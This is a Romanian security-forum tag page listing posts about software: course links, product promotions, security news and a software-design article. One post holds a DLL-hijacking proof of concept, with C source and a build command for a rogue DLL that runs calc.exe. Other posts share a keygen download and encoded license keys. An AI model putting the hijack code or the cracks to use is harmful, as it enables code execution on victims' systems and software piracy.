Jump to content

Search the Community

Showing results for tags 'software'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Hi, Another great resource for pentesting and programming is edX. They have some free and paid courses. Worth taking a look, Software Development Fundamentals: https://www.edx.org/course/software-development-fundamentals-pennx-sd1x Intro to Computing using Python: https://www.edx.org/course/introduction-computing-using-python-gtx-cs1301x Data Science Orientation: https://www.edx.org/course/data-science-orientation-microsoft-dat101x-2 How VR Works: https://www.edx.org/course/how-virtual-reality-vr-works-uc-san-diegox-cse165x Comp Sci Essentials for software development: https://www.edx.org/professional-certificate/computer-science-essentials-software Java and Android foundation: https://www.edx.org/professional-certificate/java-android-foundation Software Development: https://www.edx.org/micromasters/software-development Machine Learning: https://www.edx.org/course/machine-learning-columbiax-csmm-102x-0 Artificial Intelligence: https://www.edx.org/course/artificial-intelligence-ai-columbiax-csmm-101x-0 How to Code: simple data: https://www.edx.org/course/how-code-simple-data-ubcx-htc1x Professional Android App Development: https://www.edx.org/course/professional-android-app-development-galileox-caad003x There are many more courses to be explored, these are just some courses I find interest in. Good Luck.
  2. Switching to a new phone and falling into the trouble of how to transfer data from the old phone to the new one? Make it an easy transition with the help of Coolmuster Mobile Transfer, which empowers you with the ability to transfer overall data between two mobile phones. Devices & Carriers: Be compatible with phones and tablets run iOS and Android OSes, such as iPhone, iPad, iPod, Samsung, HTC, LG, Sony, Google, Motorola and more. It's fully compatible with AT&T, Verizon, Sprint and T-Mobile, etc. carriers. Support Data types: Almost all file types can be supported by this phone to phone data transfer, such as Contacts, Text Messages, Call Logs, Calendars, Safari Bookmarks, Photos, Music, Videos, Documents, Apps, eBooks, etc..
  3. The perfect tool for email marketing and newsletters! With Email Sender Deluxe, sending out personalized bulk email and newsletters to your customers and clients just got a whole lot easier! Simply choose your recipients, write your email and hit Send! You can easily import recipients from databases, Excel, text files or enter them manually. You can store email templates, so you don't have to type the whole newsletter again the next time you send one. Email Sender Deluxe allows you to easily preview each email before it is sent to the recipients, letting you see the email they see. Attaching files to the emails is easy as well. This mass email sender software also allows you to send to an unlimited number of recipients. If you send out newsletters regularly or need to notify your customers about new products and services, Email Sender Deluxe is here to help you! Features Send emails quickly and easily! Each recipient will get their own email, and won't see who else the email is sent to. Send personalized emails! You can insert recipient fields such as "First Name" or "Country" into your email. Easily import recipients from text files, CSV files and Excel spreadsheets. Supports import recipients from ODBC databases like Oracle, SQL Server, Access and MySQL. Use the powerful WYSIWYG editor to easily create your HTML emails. Send email using multiple connections, maximizing the speed. Setup pausing to accommodate the email sending to your SMTP server's limits. Preview all emails before they are sent. Download:
  4. https://www.sapien.com/software/sapien_software_suite Virus scan: https://www.virustotal.com/en/file/c11c02398198be84ef65b5a8c7e8916a569061f683ea368ff87454a42c3f1066/analysis/ DL link: Zippyshare.com - keygen.rar Activare offline
  5. The takeover of the SourceForge account for the Windows version of the open-source GIMP image editing tool reported by Ars last week is hardly the first case of the once-pioneering software repository attempting to cash in on open-source projects that have gone inactive or have actually attempted to shut down their SourceForge accounts. Over the past few years, SourceForge (launched by VA Linux Systems in 1999 and now owned by the tech job site company previously known as Dice) has made it a business practice to turn abandoned or inactive projects into platforms for distribution of "bundle-ware" installers. Despite promises to avoid deceptive advertisements that trick site visitors into downloading unwanted software and malware onto their computers, these malicious ads are legion on projects that have been taken over by SourceForge's anonymous editorial staff. SourceForge's search engine ranking for these projects often makes the site the first link provided to people seeking downloads for code on Google and Bing search results. And because of SourceForge's policies, it's nearly impossible for open-source projects to get their code removed from the site. SourceForge is, in essence, the Hotel California of code repositories: you can check your project out any time you want, but you can never leave. Finders, keepers As Ars reported, SourceForge posted a statement on the service's blog last week contending that GIMP had abandoned their project, and the site's team had merely picked up the account to maintain it under their "mirror" program for open source and free software projects. But the company did admit that it wrapped the GIMP installer on its site with a Web installer offering commercial software packages to get revenue out of the downloads. For some developers who post code to SourceForge, the adware offering bundles around downloads are welcome. In 2013, the FileZilla project's lead developer Tim Kosse authorized SourceForge to put an offer-producing installer around the project's download file. When someone expressed concern about the adware installer in the FileZilla forum, Kosse replied, "This is intentional. The installer does not install any spyware and clearly offers you a choice whether to install the offered software." He added that an unbundled installer was still available on FileZilla's official download page. FileZilla was an early participant in DevShare, SourceForge's revenue sharing plan for open-source developers. It was supposed to be opt-in only. By allowing SourceForge to wrap downloads in a Web installer that offered up to three different software bundles, open-source projects could generate some cash to support development. But GIMP never enrolled in DevShare—SourceForge foisted the adware on the project's Windows installer after taking over the project's page. On Sunday, the GIMP team issued an official statement through Michael Schumacher, a maintainer of the GIMP website. It said that the GIMP team was never informed of what SourceForge was going to do. "This was done without our knowledge and permission, and we would never have permitted it," Schumacher wrote. Furthermore, he noted, the move broke a promise SourceForge made in November 2013: "We want to reassure you that we will never bundle offers with any project without the developers consent." Schumacher said that "SourceForge are abusing the trust that we and our users had put into their service in the past. We don't believe that this is a fixable situation. Even if they promise to adhere to the set of guidelines outlined below, these promises are likely to become worthless with any upcoming management change at SourceForge. However, if SourceForge's current management are willing to collaborate with us on these matters, then there might be a reduction in the damage and feeling of betrayal among the Free and Open Source Software communities." One way to fix things, Schumacher said, would be for SourceForge to "provide a method for any project to cease hosting at any SourceForge site if desired, including the ability to: completely remove the project and URLs permanently, and not allow any other projects to take its place; remove any hosted files from the service, and not maintain mirrors, serving installers or files differing from those provided by the project or wrap those in any way; [and] provide permanent HTTP redirects (301) to any other location as desired by the project. This is not unreasonable to expect from a service that purports to support the free software community." However, SourceForge's current policy makes pulling a project from the site almost impossible: A little something extra GIMP left SourceForge in part because of what Schumacher called "the invasion of the big green 'Download' button ads." Those ads, which SourceForge promised to make an effort to block from download pages, appear on nearly every one of the downloads for "mirrored" open-source projects either established or taken over by SourceForge's staff. SourceForge isn't alone in hosting these deceptive advertisements that try to fool site visitors into downloading something a little extra. CNET's Downloads.com and other download-focused sites also mirror popular open-source and free software to generate advertising revenue and promote software bundles, and they often include ads with "Download" buttons that are totally unrelated to the software the visitor is seeking. And while many legitimate applications are offered through accompanying downloads on those sites, the ads often deliver software that is of questionable value at best—and malware at worst. But those other sites don't have the same open-source heritage that SourceForge's name carries. Launched in 1999 by the company then known as VA Research (and shortly after as VA Linux Systems), SourceForge was the original open community development platform. The software behind SourceForge became an enterprise product as well. By 2007, even the Department of Defense had embraced it to set up the original Forge.mil at the Defense Information Systems Agency—a way for the military's developers to create military development communities around shared projects, even classified ones. The enterprise version of SourceForge was sold off to CollabNet in April of 2007. And as competition rose from other source code repositories—chiefly from GitHub, which by January of 2013 had more than five million project repositories—many projects began to abandon SourceForge. The service's character seemed to shift after its sale by Geeknet (along with Slashdot and Freecode) to Dice Holdings for $20 million in September 2012, and that company instead focused on the retail site ThinkGeek. (Update: Geeknet is on track to be acquired by GameStop, after Gamestop outbid Hot Topic. This story originally reported the proposed acquisition by Hot Topic from last week.) The GIMP-Windows project is still active on SourceForge, and it is still packaged with the bundle-offer installer. Update: SourceForge now says that it will discontinue this practice for all "abandoned" projects, and only offer the advertisement-loaded installer as an opt-in for active project developers. Source
  6. Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,00 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected. The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user." The Borg says patches for the bug are available but warns there are no workarounds. <pSuccessful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild. Source
  7. Am sa adaug giveaway's in fiecare zi,unele licente vor suporta updates altele nu ,altele vor fi lifetime. In acest moment pot sa va dau pentru : -MiniTool Power Data Recovery Personal 6.8 -DriverEasy Professional 4.9 -WinX DVD Ripper Platinum 7.5 -EaseUS Todo Backup Home 8.2 -SecureAPlus Premium 3.3 Daca doriti dati-mi Pm cu mail-ul vostru in care sa imi spuneti programul care va intereseaza.(Lista va fi updatata aproape zilnic) Asta e una care al luat-o chiar acum,merita testata. Gilisoft Movie DVD Converter 4.5-Note: no free updates, no tech supprot b64 - MzY3MDUtMzc0NzAtMjE4NTItMzQ1NzUtODkwNTMtMzQ3NzM=
  8. The Security audit of TrueCrypt disk-encryption software has been completed, with no evidence of any critical design vulnerabilities or deliberate backdoors in its code. TrueCrypt -- one of the world's most-used open source file encryption software used by Millions of privacy and security enthusiasts -- is being audited from past two years by a team of security researchers to assess if it could be easily exploited and cracked. Hopefully, it has cleared the second phase of the audit. TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OSX and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions including the system partition. NO NSA BACKDOORS Security Auditors and Cryptography Experts at NCC took an initiative to perform a public information security audit of TrueCrypt in response to the concerns that National Security Agency (NSA) may have tampered with it, according to a leaked classified document by Edward Snowden. TrueCrypt cleared the first phase of the audit that reviewed the blueprints of the software and given a relatively clean bill of health almost a year ago. At the first phase, auditors discovered 11 issues of medium and low severity in the software. Now, the auditors from NCC Group’s Cryptography and security audit Services have finalized and published the 21-page Open Cryptographic report related to the second phase of audit that examined TrueCrypt's implementation of random number generators and critical key algorithms, and various encryption cipher suites. FOUR VULNERABILITIES DISCOVERED The report uncovered four vulnerabilities in the latest original version of the software, but none of them could lead to a bypass of confidentiality or let hackers use deformed inputs to subvert TrueCrypt. The vulnerabilities are given below: Keyfile mixing is not cryptographically sound -- Low severity Unauthenticated ciphertext in volume headers -- Undetermined CryptAcquireContext may silently fail in unusual scenarios -- High severity AES implementation susceptible to cache timing attacks -- High severity The most critical of the four vulnerabilities involved the use of Windows API to generate random numbers used by master cryptographic key. A separate vulnerability with undetermined severity checks for the volume header decryption was susceptible to tampering. Also, a low severity flaw for a method used to mix the entropy of keyfiles was not cryptographically sound. Another high severity flaw identified refers to "several included AES implementations that may be vulnerable to cache-timing attacks." Source: thehackernews.com
  9. GrabME Sensitive information extraction tool. Report a bug: https://github.com/GuerrillaWarfare/GrabME/issues Up-to-date Usage examples: https://github.com/GuerrillaWarfare/GrabME/wiki/GrabME-Usage-Examples GrabME - Extract Sensitive information from a file. Usage: ./grabme.py [FILE] What can it extract ?: Links hash values email addresses ipv4, ipv6 addresses bitcoin wallet addresses MAC addresses with : or - (deliminators) USA Based Telephone, Social Security and Major Credit Card numbers. Guerrilla Warfare Free License ("GWFL") v1.0 You're free to modify this software to YOUR liking or leave it as is. This software comes as is, and may or may not receive any additional updates, Contact the developer for more help. The initial download and use of this software constitutes that you adhere and comply to the writing of this end user license agreement (EULA). The Developer is NOT at ALL under any circumstances responsible for YOUR actions or the actions of any other third part instances that may use this software for any illegal or nefarious activities. Download Source
  10. Ori de câte ori vorbim despre design în alte domenii decât software-ul, discut?m din punct de vedere orientat c?tre utilizator. Produsele Apple sunt renumite pentru c? se concentreaz? pe experien?a utilizatorului cu dispozitivul: cum se simte, cum arat?, cât de repede r?spunde, sunetele pe care le scoate, etc. . Software Design-ul este singurul tip de design care pare s? nu aib? utilizator. La urma urmei utilizatorul final nu are nici o idee despre cum este organizat? aplica?ia pe care o folose?te ?i nici m?car nu-i pas?. Tot ce conteaz? pentru el este ca aceasta s? func?ioneze bine. ... Software Design-ul are un utilizator: programatorul care va trebui s? schimbe codul scris de echipa ta. Dac? folosi?i collective code ownership (ca majoritatea echipelor Scrum), ar fi bine s? lua?i în considerare user-centric software design (software design orientat c?tre utilizator). Idei precum "Clean Code" ating aceast? abordare dar nu o dezvolt?. În continuare, a? vrea s? explorez acest subiect în detaliu. 1. Dezvoltatorii noi care lucreaz? cu Usable Software Design vor deveni mai productivi mai repede De ce este gradul de u?urin?? în folosire al aplica?iilor web un subiect atât de important ast?zi? A? argumenta c? motivul îl constituie avantajul competitiv pe care îl aduce, deoarece utilizatorii g?sesc mult mai u?or s? înceap? s? foloseasc? o aplica?ie care este construit? având utilizatorul în minte. Niciun utilizator nu are timp s? înve?e un produs nou; vrem s? începem s? îl folosim imediat ?i s? ne aduc? beneficii instant. Noii utilizatori ai software design-ului sunt noii dezvoltatori care se al?tur? echipei. Vom presupune c? ?tiu limbajul de programare, framework-ul principal utilizat ?i au lucrat în domeniul business înainte. Cât timp le ia s? devin? productivi în mediul vostru? Timpul petrecut îi familiarizeaz? cu designul aplica?iei ?i cu modul în care lucrurile se fac în mare parte, dar se traduce prin cheltuieli. În termenii produsului, se nume?te pierdere. 2. Cerin?ele cele mai comune sunt implementate mult mai rapid cu Usable Software Design Gânde?te-te la tipul de activit??i desf??urate pe produsul curent. ?ansele sunt ca multe dintre ele s? fie repetitive. În aplica?ia de eHealth pe care o dezvolt?m, primele func?ionalit??i au luat ceva timp pentru a fi implementate (NB: în acela?i timp înv???m ?i o nou? tehnologie). Privind atent la ceea ce ne-a încetinit lucrul ?i ajustând designul, am optimizat dezvoltarea ?i am ajuns la punctul în care aproximativ 60% din munca este UI / UX design. Acum, dezvoltarea nu mai are bottleneck. Ne-am uitat apoi la optimizarea activit??ilor de UI / UX, dar asta e alt? poveste. Cheia acestei îmbun?t??iri a stat în faptul c? privind în urm?, ne-am dat seama c? dezvoltam func?ionalit??i care corespund câtorva tipuri de munc?: Ad?ugarea unei noi activit??i aplicat? pe situa?ia medical? a pacientului:create, display, change, hide; Legarea unei entit??i medicale de o intrare în jurnalul pacientului; Afi?area unui istoric filtrat dup? diverse criterii; Etc... Din moment ce ?tiam din roadmap-ul proiectului c? vor ap?rea din nou astfel de cerin?e, am început optimizarea pentru aceste tipuri de munc?. Ocazional, trebuia s? facem un nou tip de munc? care dura mai mult. Un exemplu a fost un serviciu de c?utare a unui medicament, care este rapid, scalabil ?i u?or de modificat pentru a func?iona corect cu ultima versiune a bazei de date de medicamente. A trebuit s? înv???m s? folosim vertx ?i mongodb pentru a face lucrul acesta, ?i ne-a luat de 3-5 ori mai mult timp decât o sarcin? normal?. Deoarece aceasta este o situa?ie local?, care este pu?in probabil s? se repete, nu am f?cut nimic pentru a optimiza. Ideea este: ca o aplica?ie care este u?or de folosit pentru taskuri mai comune, Usable Software Design permite implementarea rapid? a celor mai frecvente tipuri de caracteristici. Acestea sunt principalele beneficii pe care le v?d pentru Usable Software Design. Dar cum s?-l ob?inem? Primul lucru este ... 3. M?soar? ?i îmbun?t??e?te Procesul pe care l-am folosit pentru a face designul mai opera?ional a fost destul de simplu: m?soar? cât timp este nevoie pentru a implementa fiecare caracteristic?; discut? devia?iile la retrospectiv?; identific? ce ne împiedic? s? mergem mai repede; define?te ?i pune în aplicare modific?rile; repet?. Noi folosim un proces Kanban / XP, a?a c? am folosit the cycle time distribution diagram ?pentru a identifica punctele de devia?ie. Avem o retrospectiv? recurent? la fiecare dou? s?pt?mâni în care discut?m impedimentele ?i identific?m solu?iile. Implementarea a fost f?cut? în urm?toarele dou? s?pt?mâni, ?i ne-am p?strat un ochi la cycle time distribution în urm?toarele luni. A fost u?or s? vedem îmbun?t??irile deoarece majoritatea task-urilor s-au mutat la stânga. Într-un context Scrum, echipele nu m?soar? cycle time, doar viteza. Problema este c? viteza este un indicator agregat pentru toate func?iile implementate pe durata sprintului. Prin urmare, echipele Scrum au dou? op?iuni pentru a ajunge la usable software design: Cantitativ?: începe m?surarea timpului efectiv petrecut pe user story; Calitativ?: executa o retrospectiv? recurent? pe tema de usable design. Întreab? developer-ii ce le ia mai mult timp decât ar trebui. Într-o echip? în care exist? încredere ?i transparen??, ve?i identifica imediat problemele. Aceasta este metoda de baz? pentru a ob?ine usable software design. Metoda avansat? este preluat? din practicile de usability. 4. Ruleaz? teste de usability pe Software Design-ul t?u Testele de usability pot fi rulate în mai multe moduri. Am g?sit totu?i un format care se potrive?te cel mai bine pentru Software Design: Noteaz? o list? de task-uri pe care utilizatorul trebuie s? le execute. Adu într-o camer? utilizatori care nu au v?zut niciodat? produsul ( sau p?r?i ale produsului pe care vrei s? le testezi). Cere-le s? execute task-urile. M?soar? cât timp le ia s? fac? asta. Noteaz?-?i unde se blocheaz?. Folose?te feedbackul pentru a îmbun?t??i produsul. Iat? câteva exemple de task-uri comune pentru o aplica?ie web: adaug? un nou formular cu un câmp text ?i un buton save; adaug? validari suplimentare unui câmp; schimb? textul unei etichete (pentru o limb? sau toate limbile suportate); adaug? o nou? regul? de business; afi?eaz? o list? de entit??i într-o pagin?. Etc... Enumer?m câteva lucruri importante de ?tiut despre teste de usability: Asigur?-te c? le spui participan?ilor c?, dac? nu ?tiu s? fac? ceva, este vina designului, nu a lor. Încurajeaz?-i s? pun? întreb?ri când se blocheaz?. Un test complet cu o singur? persoan? n-ar trebui s? dureze mai mult de o or?. Începe cu task-urile cele mai comune întâi ?i cu cât mai pu?in? informa?ie posibil?. Ofer? informa?ie doar atunci când cineva se blocheaz? ?i cere ajutor. Preg?te?te cam zece task-uri, dar a?teapt?-te s? finalizezi mai pu?ine. Acum ?tim cum s? identific?m probleme. Sunt sigur c? urm?toare întrebare este... 5. Cum arat? Usable Software Design? Pentru început men?ionez c? ideea de a se centra pe developer, ca utilizator al Software Design-ului, este foarte nou?. Am v?zut discu?ii oarecum în jurul acestui topic, ?i am contribuit ?i eu la unele. Literatura din trecut despre Software Design a atins acest subiect, dar nu în mod explicit. Exist? totu?i foarte mult? literatur? despre usability. Voi men?iona doar trei principii de baz? ale usability-ului care se aplic? în Software Design: Claritate, Consisten??, Reducerea surprizei. Prezentam cateva exemple: Claritate: Nume?te pachetele în func?ie de denumirea func?ionalit??ii (pachete func?ionale) Iat? un screenshot de la o aplica?ie pe care o dezvolt. Po?i spune ce face doar pe baza numelor? Prima oar? l-am auzit pe Sandro Mancuso vorbind despre ideea aceasta la I T.A.K.E. Unconference 2014 (2014.itakeunconf.com) ?i am fost foarte interesat s? încerc. V?d ideea ca pe un bun start în Usable Software Design. Consisten??: P?streaz? o structur? consistent? pentru fiecare pachet func?ional A?a arat? un pachet func?ional când este extins: Fiecare con?ine trei lucruri: o clas? de request, o clas? de controller, o clas? de view. Înc? trebuie s? g?sesc un loc mai bun pentru InvoiceFileNameGenerator, dup? cum pute?i vedea limpede. Aceasta este o înc?lcare a celui de al treilea principiu, reducerea surprizei. Consisten??: Fiecare tip de clas? trebuie s? aib? o interfa?? consistent? Am v?zut mai devreme c? un pachet func?ional const? din trei tipuri de clase: a clas? de request, o clas? de controller ?i o clas? de view. Exist? ?i un nivel mai ridicat de consisten?? la care se poate ajunge, mai specific în interfa?a fiec?reia dintre aceste tipuri de clase. În acest exemplu, toate clasele de Request men?ionate mai sus au o metod?:response()?Toate func?iile controllers au o metod?:render().Fiecare func?ie de controller folose?te un view pentru a reda informa?ia. Aceste interfe?e sunt consistente în toate pachetele func?ionale. Gânduri finale Usable Software Design vor aduce dou? beneficii economice majore: implementare mai rapid? pentru task-urile comune ?i integrare mai u?oar? a oamenilor noi în proiect. Pentru a ob?ine Usable Software Design, avem nevoie de feedback de la utilizatori, mai exact de la dezvoltatori. Exist? dou? metode pentru a ob?ine: prin retrospective ?i rulând teste de usability. Ideea nu este complet nou?. Principiile precum claritate ?i consisten?? au fost folosite mul?i ani la rând pentru a ob?ine Design mai bun. Ideea de usable Software Design este totu?i o schimbare de perspectiv?; a te gândi la dezvoltator ca la utilizatorul software design-ului ?i a încerca activ s? ob?inem feedback de la el sunt demersuri care vor aduce modific?ri în modul în care ne organiz?m codul. Sursa: todaysofmag.ro
  11. /* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: SmartKey ZIP Password Recovery – Recover ZIP, WinZip, PKZip Password #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o dwmapi.dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch . Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; } Source: http://dl.packetstormsecurity.net/1503-exploits/zipprp-dllhijack.txt Edit: Cer ca postu meu s? fie ?ters , originally posted by aerosol: https://rstforums.com/forum/99634-zip-password-recovery-professional-7-1-dll-hijacking.rst
  12. The Innovative Technology Partnerships Office at NASA's Goddard Space Flight Center in Greenbelt, Maryland, announced the release of its core Flight System (cFS) Application Suite to the public. The cFS application suite is composed of 12 individual Command and Data Handling (C&DH) flight software applications that together create a reusable library of common C&DH functions. The cFS application suite allows developers to rapidly configure and deploy a significant portion of the C&DH software system for new missions, test platforms and prototypes, resulting in reduced schedule and cost. The cFS framework takes advantage of a rich heritage of successful NASA Goddard flight software efforts and addresses the challenges of rapidly increasing software development costs and schedules due to constant changes and advancements in hardware. Flight software complexity is expected to increase dramatically in coming years and the cFS provides a means to manage the growth and accommodate changes in flight system designs. The cFS is currently being used by the Core Observatory of NASA’s Global Precipitation Measurement (GPM) mission, launched on Feb. 27, 2014, from Tanegashima Space Center in Japan, and it has also been used by NASA's Ames Research Center in Moffett Field, California, on their most recent mission, the NASA Lunar Atmosphere and Dust Environment Explorer (LADEE), which launched Sept. 6, 2013. Other centers such as NASA's Marshall Space Flight Center in Huntsville, Alabama, NASA's Glenn Research Center in Cleveland, Ohio, and NASA's Johnson Space Center in Houston are currently using the cFS as well. The core Flight Executive (cFE) and the Operating System Abstraction Library (OSAL) are two cFS components previously released as open source. These two components provide a platform-independent application runtime environment. The 12 applications in this release provide C&DH functionality common to most spacecraft Flight Software (FSW) systems. This means the current suite of cFS open source applications now provide a complete FSW system including a layered architecture with user-selectable and configurable features. These architectural features coupled with an implementation targeted for embedded software platforms makes the cFS suitable for reuse on any number of flight projects and/or embedded software systems at very significant cost savings. Each component in the system is a separate loadable file and are available to download free of cost at the links listed in the table. The complete cFS software suite will fully support the cFS user community and future generations of cFS spacecraft platforms and configurations. The cFS community expects the number of reusable applications to continue to grow as the user community expands. here we go -> NASA Goddard Releases Open Source Core Flight Software System Application Suite to Public | NASA
  13. Google is continuing to refine its Safe Browsing API and now is giving users warnings about not just malicious software on sites they’re attempting to visit, but also about unwanted software. Google’s Safe Browsing API is designed to help protect users from a variety of threats on pages across the Internet. The functionality is built into Chrome, as well as Firefox and other browsers, and when a users tries to visit a page that Google’s crawlers or other users have reported to be hosting malware, phishing links or other types of threats it will throw up a warning dialog. Depending upon the type of threat found on the target page, the browser will give the user various types of information and options. Google started showing Chrome users warnings about deceptive or unwanted software last month, but now that information will be fed into the Safe Browsing API so that other browser vendors, as well as app developers, can pull it into their offerings. “In addition to our constantly-updated malware and phishing data, our unwanted software data is now publicly available for developers to integrate into their own security measures. For example, any app that wants to save its users from winding up on sites that lead to deceptive software could use our API to do precisely that,” Emily Schechter, safe browsing program manager at Google, said in a blog post. “We continue to integrate Safe Browsing technology across Google—in Chrome, Google Analytics, and more—to protect users.” Deceptive, or unwanted, software is a fairly broad category of applications that includes things such as browser extensions that change your home page or modify the settings in your browser. These applications sometimes are bundled with other software or downloaded in the background, sometimes without a user’s knowledge. They can also include spyware or adware that collect users’ data and pretend to be something other than what they really are. Google defines deceptive software broadly as “programs disguised as a helpful download that actually make unexpected changes to your computer”. Image from Flickr photos of Parkesmj. Source
  14. HP Security Bulletin HPSBST03298 1 - Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. Code: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04600552 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04600552 Version: 1 HPSBST03298 rev.1 - HP XP Service Processor Software for Windows, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-03-13 Last Updated: 2015-03-13 - ----------------------------------------------------------------------------- - --- Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. References: SSRT101826 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following HP XP Service Processor Software for Windows is affected: HP XP7 HP XP10000 HP XP12000 HP XP20000 HP XP24000 HP XP P9500 BACKGROUND For a PGP signed version of this security bulletin please write to: security-alert@hp.com Microsoft has published Security Information Bulletins since January 2009. This bulletin presents all of the necessary patches and updates for HP XP Service Processor Software in a cummulative format. This information is updated monthly. Updating the HP XP Service Processor Software can be performed without interference or distruption to data flow on the XP product. RESOLUTION HP has made a web-based spread sheet available which lists all updates to the HP XP Service Processor Software that runs on the Microsoft Windows Operating System. The OS versions include Windows 7, Window Vista (64 and 32 bit) and Windows XP. The document may be downloaded from here: HP Insight Management - Overview In this HP Enterprise Information LIbrary , Select 'Storage' at the top, In the 'Products and Solutions' column, select 'XP Storage', In the 'Information Type' column, select only 'Service and Maintenance'. The HP XP Service Processor (SVP) OS Security Patch Summary Sheet may be downloaded to your desktop. HISTORY Version:1 (rev.1) - 13 March 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: HP: Subscribe today Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned here in may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlUHov8ACgkQ4B86/C0qfVnbrgCg4oVyYhIvPf8/mkS/IwjWrMRg blEAn3uS87tqYInkFZtz8QNOjlVcU7l0 =6XaT -----END PGP SIGNATURE----- Source: http://dl.packetstormsecurity.net/1503-advisories/HPSBST03298-1.txt
  15. BitTorrent apologizes for Epic Scale crypto-miner installed with ?Torrent torrent client with after user outrage BitTorrent apologizes for Epic Scale Bitcoin mining software that users say was shadily installed ?Torrent torrent client, offers an uninstall guide BitTorrent the maker of widely popular ?Torrent torrent client came under severe fire from all quarters for bundling the popular with cryptocurrency mining software with the ?Torrent torrent client. BitTorrent was not only criticised on different websites but also on its own ?Torrent forum with users blasting it for installing the Epic Scale cryptocurrency miner without asking users for permission or warning them about it. Under the unrelenting barrage of criticism, BitTorrent today apologized to its ?Torrent torrent client users. Writing on the ?Torrent forum, a member of BitTorrent staff said that they had paused the installation of Epic Scale software with ?Torrent client. We understand the concerns that have been raised about our partner offer with Epic Scale. Amid user feedback, on Friday, mid-day we paused the offer to allow time for us to do an evaluation. For users who already installed the Epic Scale software with ?Torrent client and want to remove it conventionally, you are requested to visit the uninstall guide site here. BitTorrent also clarified that the Epic Scale software was shipped only with the Windows client and therefore Linux and Mac machines are not affected by this cryptomining software. BitTorrent however tried to muzzle the claims that the software itself was bad and went on to give a detailed reasoning for shadow installing the Epic Scale software. “There have been a lot of claims over the past few days, some of them fair and some pretty wild. We have always invited an open and constructive dialogue, particularly through our forums, and want that to continue.” “As we’ve discussed in the past, partner offers are one of the ways we generate revenue. Many of you already understand that this is a common model for software companies that provide products and technology for free. 